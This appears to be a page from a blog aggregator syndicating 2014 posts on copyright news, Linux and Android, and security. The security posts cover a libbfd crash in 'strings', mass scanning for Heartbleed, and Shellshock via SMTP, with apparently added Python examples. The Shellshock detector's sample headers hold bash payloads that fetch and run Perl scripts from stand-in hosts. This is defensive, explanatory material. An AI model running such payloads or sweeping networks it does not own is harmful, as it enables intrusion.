GattaNegra's days: Waterfall (everyday woes)

This post was syndicated from: GattaNegra's days and was written by: GattaNegra. Original post: at GattaNegra's days

Happy first snow! And I have a private waterfall at home, or, in other words, the everyday woes never end. I come home from work yesterday and together we discover a leak in the ceiling above the washing machine. Today we found out that the heating pipe has burst in such a way that it leaks from the 5th floor all the way down to the first. In situations like this, the info line […]

TorrentFreak: Embedding Is Not Copyright Infringement, EU Court Rules

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

One of the key roles of the EU’s Court of Justice is to interpret European law to ensure that it is applied in the same manner across all member states.

The Court is also called upon by national courts to clarify finer points of EU law to progress local cases with Europe-wide implications.

This week the Court of Justice issued a landmark ruling on one such case that deals with a crucial and integral part of today’s Internet. Is it legal to embed copyrighted content without permission from the rightsholder?

The case in question was referred to EU’s Court of Justice by a German court. It deals with a dispute between the water filtering company BestWater International and two men who work as independent commercial agents for a competitor.

BestWater accused the men of embedding one of its promotional videos, which was available on YouTube without the company’s permission. The video was embedded on the two men’s personal website through a frame, as is usual with YouTube videos.

While EU law is clear on most piracy issues, the copyright directive says very little about embedding copyrighted works. The Court of Justice, however, now argues that embedding is not copyright infringement.

The full decision has yet to be published officially by the Court’s website but TorrentFreak has received a copy (in German) from the defendants’ lawyer Dr. Bernhard Knies, who describes it as a landmark victory.

The Court argues that embedding a file or video is not a breach of the creator’s copyright under European law, as long as the work is neither altered nor communicated to a new public. In the current case, the video was already available on YouTube, so embedding it is not seen as a new communication.

“The embedding in a website of a protected work which is publicly accessible on another website by means of a link using the framing technology … does not by itself constitute communication to the public within the meaning of [the EU Copyright directive] to the extent that the relevant work is neither communicated to a new public nor by using a specific technical means different from that used for the original communication,” the Court’s verdict reads.

The Court based its verdict on an earlier decision in the Svensson case, where it found that hyperlinking to a previously published work is not copyright infringement. Together, both cases will have a major impact on future copyright cases in the EU.

For Internet users it means that they are protected from liability if they embed copyrighted videos or images from other websites, for example. In addition, it may also protect streaming sites that use third-party services to embed videos, even if the source is an infringing copy.

During the days to come the Court of Justice is expected to issue official translations of the ruling as well as a press release. Many legal experts have been waiting for the decision and further analysis of the verdict’s implications is expected to follow soon after.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Pirate Bay Blockade Set For Icelandic Expansion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

In common with many countries around Europe, the movie and music industries in Iceland have been working hard to cut down on copyright infringement online. To this end copyright groups including the local equivalents of the RIAA (STEF) and MPAA (SMAIS) have targeted the leader of the usual suspects, the notorious Pirate Bay.

After complaints to the police failed, STEF and SMAIS turned to web-blocking in the hope of achieving similar results to those netted by rightsholders in the UK, Italy, the Netherlands, Belgium and Denmark.

Following setbacks STEF decided to go it alone and earlier this month achieved the result they’d been looking for. The Reykjavík District Court handed down an injunction to ISPs Vodafone and Hringdu forcing them to block several domains belonging to The Pirate Bay and Deildu, a private torrent site popular with locals.

Just two weeks later and it’s now becoming clear that STEF won’t be happy until all of Iceland’s leading ISPs are blocking too.

Earlier this week the rights group demanded responses from ISPs including Síminn, Tal and 365 Media as to whether the companies will agree to block Pirate Bay and Deildu in the wake of the Vodafone decision. Threatening legal action, STEF gave the ISPs until Wednesday to respond.

According to local news outlet MBL, 365 Media informed STEF it was willing to at least consider the idea, but both Síminn and Tal appear to have rejected voluntary blocking, preferring official action through the courts instead.

Síminn said that it is not the role of communications companies to decide which sites should be closed and which should remain open, so it would need to be presented with a formal injunction in order to block Pirate Bay and Deildu. In broad terms, Tal said the same.

As a result, lawyer Tómas Jónsson says that STEF will now press ahead with its efforts to obtain injunctions against the ISPs that have raised objections. Procedural issues aside, which have dogged previous efforts, it is likely that sooner or later STEF will achieve its aims.

Finally, there has been a recent trend for under-pressure sites to look at Icelandic hosting and local .IS domains in the belief that they offer better protection than those available elsewhere.

While that may indeed be true, Iceland’s domain registry has just canceled an .IS domain that was operated by people with links to Islamic State.

“This is in fact a sad day for ISNIC. We are very sad over this. It was not an easy decision to do this. We had a reputation for never having suspended a domain name. That is not the reality anymore. These people have ruined that for us,” said ISNIC director Jens Pétur Jensen.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

lcamtuf's blog: PSA: don’t run ‘strings’ on untrusted files

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Many shell users, and certainly most of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is that the tool simply scans the file for runs of printable characters and dumps them to stdout – something that is very unlikely to put you at any risk.

It is much less known that the Linux version of strings is an integral part of GNU binutils, a suite of tools that specializes in the manipulation of several dozen executable formats using a bundled library called libbfd. Other well-known utilities in that suite include objdump and readelf.

Perhaps simply by virtue of being part of that bundle, the strings utility tries to leverage the common libbfd infrastructure to detect supported executable formats and “optimize” the process by extracting text only from specific sections of the file. Unfortunately, the underlying library can hardly be described as safe: a quick pass with afl (and probably with any other competent fuzzer) reveals a range of troubling and likely exploitable out-of-bounds crashes due to very limited range checking, for example:

$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
...
$ strings strings-bfd-badptr2
Segmentation fault
...
strings[24479]: segfault at 4141416d ip 0807a4e7 sp bf80ca60 error 4 in strings[8048000+9a000]
...
      while (--n_elt != 0)
        if ((++idx)->shdr->bfd_section)                                ← Read from an attacker-controlled pointer
          elf_sec_group (idx->shdr->bfd_section) = shdr->bfd_section;  ← Write to an attacker-controlled pointer
...
(gdb) p idx->shdr
$1 = (Elf_Internal_Shdr *) 0x41414141

The 0x41414141 pointer being read and written by the code comes directly from that proof-of-concept file and can be freely modified by the attacker to try to overwrite program control structures. Many Linux distributions ship strings without ASLR (the binary is not built as a position-independent executable, which is why the crash above shows it mapped at the fixed address 0x8048000), making potential attacks easier and more reliable – a situation reminiscent of one of the recent bugs in bash.

Interestingly, the problems with the utility aren’t exactly new; Tavis spotted the first signs of trouble some nine years ago.

In any case: the bottom line is that if you are used to running strings on random files, or depend on any libbfd-based tools for forensic purposes, you should probably change your habits. For strings specifically, invoking it with the -a parameter seems to inhibit the use of libbfd. Distro vendors may want to consider making the -a mode default, too.
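What people assume strings does, a raw scan for printable runs, is easy to write without any format parsing at all. The following is an added example (my code, not lcamtuf's and not part of binutils): it scans bytes like `strings -a` does and never treats anything in the file as a length, an offset or a pointer, so an attacker who controls the file controls only what gets printed. The sample bytes are constructed, and the function names and the -n/--min-len option are my own choices.

```python
"""A format-agnostic 'strings': report runs of printable bytes without ever
parsing the input as an executable. Added example, not lcamtuf's code and not
part of GNU binutils; it does roughly what `strings -a` does (scan the whole
file) and, by construction, never hands the bytes to libbfd or any other
format parser."""
import argparse
import pathlib
import sys
from typing import List, Tuple

# Printable ASCII plus tab, the default character class GNU strings uses.
PRINTABLE = frozenset(range(0x20, 0x7F)) | {0x09}


def extract_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str]]:
    """Return (offset, text) for every maximal run of >= min_len printable bytes.

    One pass over raw bytes: no headers, no section table. Nothing read from
    the file is ever used as a size or an address, so the only thing the file
    can influence is the output."""
    found: List[Tuple[int, str]] = []
    start = None
    for i, b in enumerate(data):
        if b in PRINTABLE:
            if start is None:
                start = i
            continue
        if start is not None and i - start >= min_len:
            found.append((start, data[start:i].decode("ascii")))
        start = None
    # A run that reaches end of file has no terminator; flush it too.
    if start is not None and len(data) - start >= min_len:
        found.append((start, data[start:].decode("ascii")))
    return found


# Constructed sample (not a real binary): an ELF-looking header followed by a
# few byte runs, including the 0x41414141 value the post shows being
# dereferenced by libbfd. Here it is just the string "AAAA".
SAMPLE = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"/lib64/ld-linux-x86-64.so.2\x00"
    + b"\x41\x41\x41\x41" + b"\x00\x01\x02"
    + b"Hi\x00"
    + b"GCC: (GNU) 4.9.1\x00"
)


def main(argv: List[str]) -> int:
    ap = argparse.ArgumentParser(description="strings without libbfd")
    ap.add_argument("-n", "--min-len", type=int, default=4,
                    help="minimum run length to report (default 4)")
    ap.add_argument("files", nargs="*",
                    help="files to scan (default: the built-in sample)")
    args = ap.parse_args(argv[1:])
    inputs = [(p, pathlib.Path(p).read_bytes()) for p in args.files]
    if not inputs:
        inputs = [("<sample>", SAMPLE)]
    for name, data in inputs:
        for off, text in extract_strings(data, args.min_len):
            print(f"{name}:{off:#x}: {text}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments to see the sample scanned; offsets are printed in hex so they can be compared with a hexdump.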

PS. I actually had the libbfd fuzzing job running on this thing!

Lauren Weinstein's Blog: Stop the Ebola Witch-Hunt!

This post was syndicated from: Lauren Weinstein's Blog and was written by: Lauren. Original post: at Lauren Weinstein's Blog

There’s a wonderful old 1963 episode of the classic original “The Outer Limits” series called “The Sixth Finger.” It stars David McCallum as a man who is artificially and rapidly evolved into the human of the far future, both in terms of physical appearance and vastly enhanced intellect. At one critical juncture, as he surveys the pitiful confusion of the…

SANS Internet Storm Center, InfoCON: green: Scanning for Single Critical Vulnerabilities, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Where I work, we have a decent-sized IP space and scanning can be problematic. Within our IP space, we have roughly 20 million IPs. Traditional scanning using Nmap, while effective, can take a long time even with aggressive scan settings. By leveraging newer scanning tools like Masscan (hxxps://github.com/robertdavidgraham/masscan), this scanning can be done in minutes. With moderate settings (I don't want to crash firewalls) it takes about 15 minutes per port.

While this example is specific to Heartbleed, I use this technique for any exploit-of-the-day. By using a fast port scanner to reduce the host list to only the systems running the service in question, you can dramatically cut your scan time. Additionally, within the first couple of days of an exploit you may be scanning with a custom script rather than a plugin from an enterprise solution.

Another use case is a vulnerability found during incident response. If I determine a specific vulnerability was used to compromise a server, I then use this technique to determine other possible compromised systems. If they were not compromised, then we have them patch.

Masscan

Installing

git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
make install

Masscan uses a command line similar to nmap's:

masscan -p 443,448,456,563,614,636,989,990,992,993,994,995,8080,10000 10.0.0.0/8 -oG 10-scan-ssl --max-rate 10000

--max-rate sets the speed of the scan (packets per second).

Once Masscan has quickly identified targets for deeper inspection, you can use your more specific tool to determine whether each system is vulnerable. In this example, it's an nmap NSE script.

NMAP

cd /tmp

svn co https://svn.nmap.org/nmap

cd nmap

./configure

make

make install

To get the input file in the correct format, use the following command to produce a file with a single IP per line (masscan's grepable output has one line per open port, so a host with several open ports appears more than once; sort -u collapses the duplicates):

grep -v '#' 10-scan-ssl | awk '{print $2}' | sort -u > /tmp/nmap

nmap -p 443,448,456,563,614,636,989,990,992,993,994,995,8080,10000 --script=ssl-heartbleed.nse -iL /tmp/nmap -oA /tmp/ssl-vul-test
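The glue between the two steps, as an added example rather than the diary's own commands: it parses masscan's -oG output into a unique host list, optionally keeps only the hosts with a port of interest open, and builds the nmap invocation shown above. The sample -oG lines are constructed to mimic masscan's grepable format (every IP and timestamp is made up), and the function names are mine. Whether a given masscan build prefixes each line with a Timestamp: field is not asserted here; the parser keys on the Host: label instead of a field position, which is what breaks awk's $2 if such a prefix is present.

```python
"""Turn masscan -oG output into a de-duplicated nmap target list and build the
follow-up nmap command. Added example, not the diary's code and not part of
masscan or nmap. The -oG lines below are constructed to mimic masscan's
grepable format; every IP, timestamp and count in them is made up."""
import ipaddress
import re
import shlex
import sys
from collections import defaultdict
from typing import Dict, Iterable, List, Set

SSL_PORTS = "443,448,456,563,614,636,989,990,992,993,994,995,8080,10000"

# Constructed sample of masscan -oG output (no real scan behind it). masscan
# emits one line per open port, so a host with several open ports repeats.
SAMPLE_OG = """\
# Masscan 1.0.3 scan initiated Fri Oct 24 12:00:00 2014
# Ports scanned: TCP(14;443,...) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.1.2.3 ()\tPorts: 443/open/tcp////
Host: 10.1.2.3 ()\tPorts: 8080/open/tcp////
Timestamp: 1414152001\tHost: 10.1.9.7 ()\tPorts: 993/open/tcp////
Host: 10.200.0.14 ()\tPorts: 10000/open/tcp////
# Masscan done at Fri Oct 24 12:15:00 2014
"""

HOST_RE = re.compile(r"\bHost:\s+(\S+)")
OPEN_PORT_RE = re.compile(r"(\d+)/open/")


def parse_masscan_og(text: str) -> Dict[str, Set[int]]:
    """Map each host to the set of open ports masscan reported for it.

    Keys on the 'Host:' label instead of a fixed field position (awk's $2), so
    a line with or without a leading 'Timestamp:' field parses the same way."""
    hosts: Dict[str, Set[int]] = defaultdict(set)
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        m = HOST_RE.search(line)
        if m:
            hosts[m.group(1)].update(int(p) for p in OPEN_PORT_RE.findall(line))
    return dict(hosts)


def targets(hosts: Dict[str, Set[int]], ports: Iterable[int] = ()) -> List[str]:
    """Unique hosts in address order, one per line for nmap -iL. If ports is
    given, keep only hosts with at least one of them open (the 'reduce to the
    systems running the service' step from the diary)."""
    wanted = set(ports)
    keep = [h for h, open_ports in hosts.items() if not wanted or open_ports & wanted]
    return sorted(keep, key=ipaddress.ip_address)


def nmap_command(target_file: str, out_prefix: str) -> List[str]:
    """The per-host check from the diary: nmap's ssl-heartbleed NSE script over
    the same port list, reading targets from the file we wrote."""
    return ["nmap", "-p", SSL_PORTS, "--script=ssl-heartbleed",
            "-iL", target_file, "-oA", out_prefix]


def main(argv: List[str]) -> int:
    # Usage: script.py [masscan-output.gnmap]; defaults to the built-in sample.
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_OG
    hosts = parse_masscan_og(text)
    target_file, out_prefix = "/tmp/nmap", "/tmp/ssl-vul-test"
    with open(target_file, "w") as f:
        f.write("\n".join(targets(hosts)) + "\n")
    print(f"{len(hosts)} unique hosts written to {target_file}")
    print("run:", shlex.join(nmap_command(target_file, out_prefix)))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Pass `targets(hosts, ports=[443])` when the exploit-of-the-day concerns a single service; the host list shrinks to exactly the machines that answered on that port.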

I've had mixed results with other scanners (scanrand, etc.). Are there any other large-scale scanners with which you have had good success?

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: Taiga, a new open source project management tool with focus on usability (Opensource.com)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Opensource.com takes a look at the Taiga project management tool. “It started with the team at Kaleidos, a Madrid-based company that builds software for both large corporations and startups. Though much of their time is spent working for clients, several times a year they break off for their own Personal Innovation Weeks (ΠWEEK). These are weeklong hack-a-thons dedicated to personal improvement and prototyping internal ideas of all sorts. While there, they unanimously decided to solve the biggest of their own problems: project management.

Taiga was born, and by early 2014, the team at Kaleidos was already using Taiga for all their internal projects. Taiga Agile, LLC was formed in February 2014 to give the project a formal structure, and the source code was made available at GitHub.”

SANS Internet Storm Center, InfoCON: green: Shellshock via SMTP, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

I've received several reports of what appear to be Shellshock exploit attempts via SMTP. The sources so far have all been web hosting providers, so I'm assuming these are compromised systems.

The payload is a Perl IRC bot with simple DDoS commands and the ability to fetch and execute further code.
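A detection pass over the headers of one such message, as an added example and not the diary's code: CVE-2014-6271 is triggered by the bash function-export prefix `() {` appearing in an environment variable, so the check looks for that prefix in each header value and pulls out the URLs the payload tries to fetch, which is what the diary says the bot does next. The message is constructed (RFC 5737 documentation addresses, made-up paths), and the regexes and function names are my own.

```python
"""Flag Shellshock-style payloads in SMTP headers and extract the URLs they
fetch. Added example, not the ISC diary's code. The known CVE-2014-6271
trigger is the bash function-export prefix "() {", so the check keys on that
in header values. The message below is constructed: its addresses come from
the RFC 5737 documentation ranges and its URLs point nowhere real."""
import email
import re
import sys
from typing import Dict, List, Tuple

# "()" then optional whitespace then "{": the prefix a vulnerable bash parses
# as a function definition when it shows up in an environment variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Fetch targets inside the payload; stop at whitespace, quotes and shell
# separators so "http://host/x;" yields "http://host/x".
URL_RE = re.compile(r"https?://[^\s'\";|&)]+")

# Constructed sample message (not a captured attack).
SAMPLE_MSG = (
    "Received: from mail.example.net (mail.example.net [192.0.2.10])\r\n"
    "From: () { :; }; /bin/bash -c 'cd /tmp; wget http://192.0.2.10/legion.txt; perl legion.txt'\r\n"
    "To: () { :; }; /bin/bash -c 'cd /tmp; curl -O http://198.51.100.7/bot.pl; perl bot.pl'\r\n"
    "Subject: () { :;}; /bin/true\r\n"
    "Date: Fri, 24 Oct 2014 10:11:12 +0000\r\n"
    "X-Mailer: Budget (final) { draft }\r\n"
    "\r\n"
    "hello\r\n"
)


def find_shellshock_headers(raw: str) -> List[Tuple[str, str, List[str]]]:
    """Return (header name, value, urls) for every header carrying the prefix.

    The stdlib parser unfolds multi-line headers before we match, so a
    payload split across continuation lines is still seen whole."""
    msg = email.message_from_string(raw)
    hits: List[Tuple[str, str, List[str]]] = []
    for name, value in msg.items():
        if SHELLSHOCK_RE.search(value):
            hits.append((name, value, URL_RE.findall(value)))
    return hits


def iocs(raw: str) -> Dict[str, List[str]]:
    """Aggregate indicators: which headers were abused and every fetch URL."""
    hits = find_shellshock_headers(raw)
    urls = sorted({u for _, _, found in hits for u in found})
    return {"headers": [name for name, _, _ in hits], "urls": urls}


def main(argv: List[str]) -> int:
    # Usage: script.py [message.eml]; defaults to the built-in sample.
    # Exit status 1 when a payload was found, grep-style, so it can gate a
    # mail filter or a triage loop.
    raw = open(argv[1]).read() if len(argv) > 1 else SAMPLE_MSG
    hits = find_shellshock_headers(raw)
    for name, value, urls in hits:
        print(f"{name}: {value}")
        for u in urls:
            print(f"  fetches {u}")
    return 1 if hits else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The X-Mailer line is there as a negative case: a brace after a parenthesised word is not the `() {` prefix, and the check must not fire on it.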

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Pirate Bay Sends 100,000 New Users to “Free” VPN

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

With an increasing number of BitTorrent users seeking solutions to hide their identities from the outside world, VPN services have seen a spike in customers in recent years.

Pirate Bay users also have a great interest in anonymity. A survey among the site’s users previously revealed that nearly 70% already had a VPN or proxy or were interested in signing up with one.

For this last group The Pirate Bay has an interesting promotion running. For the past few days the site has replaced its iconic logo with an ad for FrootVPN, a new startup that offers free VPN accounts.

The promo has been seen by millions of people, many of whom are very interested in the costless offer.

Since VPNs are certainly not free to run, many people are wondering whether there is a catch behind this rather generous offer. TPB previously advertised an adware-ridden client, so the suspicion is understandable.

TorrentFreak contacted the Pirate Bay team for more information, and they informed us that the FrootVPN promotion is not a paid ad. It is merely a friendly plug for a startup run by some guys they know.

While that is reassuring, it doesn’t explain how they can offer their service for free. We contacted the FrootVPN operators to find out more, and they told us that they started the free VPN to counter the commercialization of the VPN business.

“The whole idea behind FrootVPN was to provide a free simple VPN service without any bandwidth limitations. Of course the maintenance isn’t free but we had some resources over from our other projects from which we were able to launch FrootVPN.”

“We are a bunch of guys who support freedom of speech and don’t like the idea that VPN providers charge so much money for just a simple proxy, especially since bandwidth costs nowadays are so cheap,” FrootVPN tells us.

While a free VPN sounded like a good idea, the service has become a victim of its own success. It gained 100,000 users in less than a week, and its operators admit that keeping the service free forever is not sustainable.

“The word has spread rapidly and we thank all our promoters including TPB for supporting us. We got 100,000 users within a week, which we never expected. However, this does indicate that we will be forced to charge something for the service in order to maintain it,” FrootVPN says.

FrootVPN’s VPN servers are currently hosted at Portlane, who have been very helpful in accommodating the growth. During the weeks to come they hope to increase their capacity and FrootVPN has already bought several new servers to keep the quality of the service on par.

“We have 20x servers running currently with 2x10Gbps total capacity. We have now additionally bought 40x more servers and 4x10Gbps bandwidth from Portlane which will be ready within a week or two. We hope that after this upgrade the quality of our service will be much better,” they say.

While they may have to charge a few dollars in the future, one of the main motivations of the FrootVPN team remains in line with The Pirate Bay’s original philosophy. That is, to provide tools that help to bypass censorship and promote freedom of speech.

“FrootVPN supports freedom of speech and wants the Internetz to be an uncensored place,” they say.

Although free VPNs are often not the fastest, especially not when they are growing with tens of thousands of users per day, FrootVPN says it will try to keep up. In any case, “free” is an offer that’s hard to refuse for those who are on a tight budget.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Friday’s security advisories

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Debian has updated pidgin (multiple vulnerabilities).

Mageia has updated ctags (denial of service), ejabberd (incorrectly allows unencrypted connections), iceape (multiple vulnerabilities), libxml2 (denial of service), lua (code execution), openssl (multiple vulnerabilities), and phpmyadmin (cross-site scripting).

Mandriva has updated ctags (denial of service), ejabberd (incorrectly allows unencrypted connections), java-1.7.0-openjdk (multiple vulnerabilities), libxml2 (denial of service), lua (code execution), openssl (multiple vulnerabilities), and phpmyadmin (cross-site scripting).

Red Hat has updated kernel (RHEL6.5: denial of service).

Ubuntu has updated openjdk-7 (14.10: multiple vulnerabilities).

Darknet - The Darkside: Microsoft Zero Day OLE Vuln Being Exploited In Powerpoint

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

So the latest news is, don’t open any .ppt files if you aren’t entirely sure where they came from, as there is a Microsoft zero-day vulnerability in OLE (Object Linking and Embedding) handling in Microsoft Office that is currently being exploited in the wild by malicious PowerPoint slide decks. Not that anyone reading this [...]

The…

Read the full post at darknet.org.uk

SANS Internet Storm Center, InfoCON: green: Are you receiving Empty or “Hi” emails?, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

I wanted to perform a little unscientific information gathering. I'm working with a small group who think they're being specifically targeted by these, while I think it's more widespread and opportunistic. If you've recently received these no-content probe emails, or a simple "Hi" message, please send a simple comment below in this format:

  • Industry
  • Order of magnitude in size (e.g. 10, 100, 1000)
  • Sending domain

Feel free to use our comment page to add extra analysis comments here: https://isc.sans.edu/contact.html

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: openSUSE Factory and Tumbleweed to merge

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

The openSUSE project has announced that the “Factory” and “Tumbleweed” distributions will merge into a single rolling distribution (called “Tumbleweed”). There is also an FAQ posting about the merger. “With the vast improvements to the Factory development process over the last 2 years, we effectively found ourselves as a project with not one, but two rolling release distributions in addition to our main regular release distribution. GregKH signalled his intention to stop maintaining Tumbleweed as a ‘rolling-released based on the current release’. It seemed a natural decision then to bring both the Factory rolling release and Tumbleweed rolling release together, so we can consolidate our efforts and make openSUSE’s single rolling release as stable and effective as possible.”

Raspberry Pi: Scooter with blinkenlights

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Alex Markley, a programmer, writer and comedian, has a young relative who, thanks to a Model A Raspberry Pi, some Adafruit Neopixels, some sensors and a scooter is currently the world’s happiest nine-year-old.

I asked Alex if he’s written the project up – he says he’s working on it. We’ll add a link to any build instructions he produces as soon as they’re available.

Дни: The early dog barks early

This post was syndicated from: Дни and was written by: Антония. Original post: at Дни

People wake at the third cock-crow; we wake at the first dogs. Somewhere around 3 in the morning the pack of strays from the abandoned house starts yapping, whimpering, howling… and keeps it up for at least half an hour.

The next day you look at the world through half-open eyes and everything is grey, grey. Dog-style.

TorrentFreak: Porn Piracy Cash Threats to Hit Virgin Media Customers

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

It’s been more than seven years since so-called copyright trolls first tried their luck with the British public. UK law firm Davenport Lyons, a company that attempted to mislead future targets with a semi-bogus high-profile damages ‘ruling’, went into administration in early 2014, but not before its partners were disciplined for targeting innocent people.

The follow-up debacle involving ACS:Law was widely documented, with owner Andrew Crossley being forced to close down his business after being suspended by the Solicitors’ Regulatory Authority for misconduct. After misleading the courts, bankruptcy was just the icing on the cake.

None of this was a deterrent to porn outfit GoldenEye International. They embarked on a similar scheme, sending letters to alleged file-sharers and demanding hundreds of pounds in settlements to make supposed lawsuits go away. However, GoldenEye learned from its predecessors by proceeding with caution and staying largely under the radar. But quite predictably and despite legal bluster and empty threats, the company took not a single case to court.

So today, quite possibly due to the tendency of the public to pay up rather than become linked with embarrassing porn movie titles, the porn trolls are back once again in the UK.

TorrentFreak has learned that last year four porn producers teamed up in an effort to force ISP Virgin Media to hand over the names and addresses of more than 1,500 subscribers said to have downloaded and shared adult content without permission.

The companies, none of which appear to be based in the UK, teamed up with Wagner & Co, the London law firm also working with GoldenEye. They are Mircom International Content Management & Consulting Ltd, Sunlust Pictures, Combat Zone Corporation and Pink Bonnet, Consultores de Imagem LDA.

Mircom International Content Management & Consulting Ltd are active in Europe, particularly when it comes to demanding cash settlements from alleged file-sharers in Germany. Sunlust Pictures is an adult movie company founded in 2009 by former porn actress Sunny Leone, who – entirely unsurprisingly – has featured in copyright trolling cases in the United States. Combat Zone Corporation is an adult movie company based in California. They’re no strangers to the cash settlement model either.

TorrentFreak contacted Mark Wagner at Wagner & Co to find out what his clients hope to achieve in the UK, but unfortunately our emails went unanswered. The company doesn’t appear to have a working website, and its address relates to a house in a residential area.

Fortunately, Virgin Media were rather more accommodating. In the past the ISP has been criticized for not doing more to protect its subscribers’ personal details but it turns out the battle with Wagner & Co has been going on for some time.

“We have contested the validity of Wagner & Co’s claims (ongoing for 12 months), asking the Judge to thoroughly review the application and the supporting evidence. We have challenged the reliability of the software used to obtain evidence of infringement (FileWatchBT) and the accuracy of the data collected,” spokesperson Emma Hutchinson told TF.

But despite Virgin Media’s efforts the High Court took the decision to side with Wagner & Co and order the ISP to hand over the details of its subscribers. While the situation is pretty grim, things could have been worse.

“The original request was for double the number of addresses than we have been forced to disclose, now fewer than 800,” Virgin explain.

“We advise any of our customers who receive a speculative letter from Wagner & Co, who also represented Golden Eye International in action against O2 customers last year, to seek independent advice from organizations such as Citizens Advice,” the ISP concludes.

Restrictions placed on GoldenEye in previous procedures indicate that initial letters sent to Virgin customers by Wagner & Co and its clients will not be as aggressive as the ones sent out by ACS:Law and will not contain a precise settlement amount. However, it is guaranteed that cash will be requested at some point.

Upon receipt of these “speculative invoices” there will be those who panic and pay up, and that’s their prerogative. But it’s highly likely that those who admit nothing and stand firm will pay what they’ve always paid in UK cases – absolutely nothing.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: ISC StormCast for Friday, October 24th 2014 http://isc.sans.edu/podcastdetail.html?id=4207, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

xkcd.com: Houston

This post was syndicated from: xkcd.com and was written by: xkcd.com. Original post: at xkcd.com

'Oh, hey Mom. No, nothing important, just at work.'

Backblaze Blog: The New Backblaze Blog Site

This post was syndicated from: Backblaze Blog and was written by: Andy Klein. Original post: at Backblaze Blog

As you can see we’ve updated our blog. Over the years we’ve published over 300 posts and we decided we could organize things a bit better. Along the way we made changes to the layout, the categories, comments, and more. Easier to Use First, we changed the look and layout of the blog by adding….

Author information

Andy Klein

Andy has 20+ years experience in technology marketing. He has shared his expertise in computer security and data backup at the Federal Trade Commission, Rootstech, RSA and over 100 other events. His current passion is to get everyone to back up their data before it’s too late.

The post The New Backblaze Blog Site appeared first on Backblaze Blog.

Linux How-Tos and Linux Tutorials: How to Get Open Source Android

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

Android is an astonishing commercial success, and is often touted as a Linux success. In some ways it is; Google was able to leverage Linux and free/open source software to get Android to market in record time, and to offer a feature set that quickly outstripped the old champion iOS.

But it’s not Linux as we know it. Most Android devices are locked down, and we can’t freely download and install whatever operating systems we want like we can with our Linux PCs, or install whatever apps we want without jailbreaking devices that we own. We can’t set up a business to sell Google Android devices without jumping through a lot of expensive hoops (see The hidden costs of building an Android device and Secret Ties in Google’s “Open” Android.) We can’t even respin Google Android however we want to and redistribute it, because Google requires bundling a set of Google apps.

So where do you go to find real open source Android? Does such a thing even exist? Why yes it does.

F-Droid: FOSS Repository

There are quite a few Android repositories other than the Google Play Store, such as Amazon Appstore for Android, Samsung Galaxy Apps, and the Opera Mobile Store. But there is only one, as far as I know, that stocks only free/open source apps, and that is F-Droid (figure 1).

F-Droid is a pure volunteer effort. It was founded in 2010 by Ciaran Gultnieks, and is now operated by F-Droid Limited, a non-profit organisation registered in England. F-Droid relies on donations and community support. The good F-Droid people perform security and privacy checks on submitted apps, though they wisely warn that there are no guarantees. F-Droid promises to respect your privacy and to not track you, your devices, or what you install. You don’t need to register for an account to use the F-Droid client, which sends no identifying information to their servers other than its version number.

To get F-Droid, all you do is download and install the F-Droid client (the download button is on the front page of the site). Easy peasy. You can browse and search apps on the website and in the client.

Other FOSS Android Directories

DroidBreak is a nice resource for finding FOSS Android apps. DroidBreak is not a software repository, but a good organized place to find apps.

AOpenSource.com is another FOSS Android directory. It gives more information on most of the apps, and has some good Android books links.

PRISM Break lists alternatives to popular closed-source proprietary apps, and is privacy- and security-oriented.

Now let’s look at how to get a FOSS Android operating system.

CyanogenMod

